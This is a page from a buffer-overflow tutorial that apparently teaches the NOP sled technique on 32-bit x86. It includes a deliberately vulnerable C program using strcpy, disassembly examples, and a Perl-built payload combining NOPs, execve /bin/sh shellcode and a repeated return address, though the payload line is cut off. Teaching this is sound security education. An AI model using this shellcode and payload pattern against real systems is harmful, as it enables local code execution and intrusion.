NOP Sled

To directly transfer control flow to our shellcode, we need to specify its address as the return address of the current function. However, guessing the exact address can be very hard, especially on remote machines without the possibility to use a debugger. Already minor system differences can lead to a different stack layout.

Example: Remember that argv[0] contains the execution path of the program. Starting the binary from a different directory results in a different execution path and thus a different stack layout1).

Even an offset of a single byte to the correct address breaks the exploit. See the following x86 assembly code immediately terminating the application.

; nasm -f elf32 offset.s
global _start
mov eax, 1
mov ebx, 0
int 0x80

Disassembling the object file with objdump shows the correct result.

$ objdump -d -M intel-mnemonic correct_offset.o 

correct_offset.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   b8 01 00 00 00          mov    eax,0x1
   5:   bb 00 00 00 00          mov    ebx,0x0
   a:   cd 80                   int    0x80

It is interesting to see that the opcodes of the x86 instructions have variable lengths2).

To show the importance of correct instruction offsets, only the very first byte (value 0xb8) of the opcode is deleted.

$ objdump -d -M intel-mnemonic incorrect_offset.o

incorrect_offset.o:     file format elf32-i386

Disassembly of section text:

00000000 <text>:
   0:   01 00                   add    DWORD PTR [eax],eax
   2:   00 00                   add    BYTE PTR [eax],al
   4:   bb 00 00 00 00          mov    ebx,0x0
   9:   cd 80                   int    0x80

Note that even for this tiny example with a single deleted byte the resulting code is significantly different from the original one.

What we are trying to do now is to create some kind of memory area in front of our code where we can safely redirect execution to. By definition the bytes in this area must be valid opcodes. As seen before, only one single byte of offset at the instruction address can destroy any meaning of the code. To avoid this, we need to find an instruction that is only a single byte long. Our final requirement for the instruction is to not affect any registers (except for the instruction pointer, which is naturally incremented by one after execution). The x86 instruction set provides an instruction that fulfills all our requirements - the NOP (No OPeration) instruction. Having an opcode of 0x90, it is usually implemented as an alias instruction to the following code3):

xchg eax,eax

Next, we will take a look at a simple example and make use of this technique called NOP sled4).

// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
    char buffer[128] = {0};
    if(argc != 2)
        printf("A single argument is required.\n");
        return 1;
    printf("Buffer: %p\n", buffer);
    strcpy(buffer, argv[1]);
    return 0;

Inspecting the code above, you will notice that the only difference to our example from the buffer overflow introduction is the size of the buffer. Back then, it was of utmost importance to correctly overwrite the return address and exactly know the address to jump to. By adding a sequence of NOPs directly before the shellcode, we can loosen the second constraint. This sequence of NOPs is commonly called a „NOP sled“5). Returning to anywhere in this sequence is equally fine as to land exactly at the beginning of the shellcode. In case the NOPs are hit, the processor spends some cycles doing nothing until it reaches the real shellcode.

In this example we have a buffer of size 128 while our shellcode takes up only 28 bytes. Thus we have 100 bytes of space left for the NOP sled. As this amount of characters is cumbersome to type and copy, we will generate the input with Perl. The NOP sled is followed by the actual shellcode and the approximate address we want to jump to. It is sufficient to land somewhere within the 100 byte range of the NOP sled, we do not need to know the exact address of the shellcode. Assuming a correct alignment with respect to the stack variables, we can also specify the target address multiple times with a higher chance of overwriting the return address.

Our payload now contains the following:

  • 100 bytes NOP sled
  • 28 bytes shellcode
  • 16 bytes of the approximate target address 0xffffd2ff (4 byte address value repeated 4 times)

A visual representation of the memory layout is included below.

Passing this payload to the application successfully spawns a shell.

$ ./a.out $(perl -e 'print
"\x90"x100 .
"\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" .
Buffer: 0xffffd2e4

← Back to buffer overflow basics Overview Continue with external buffers →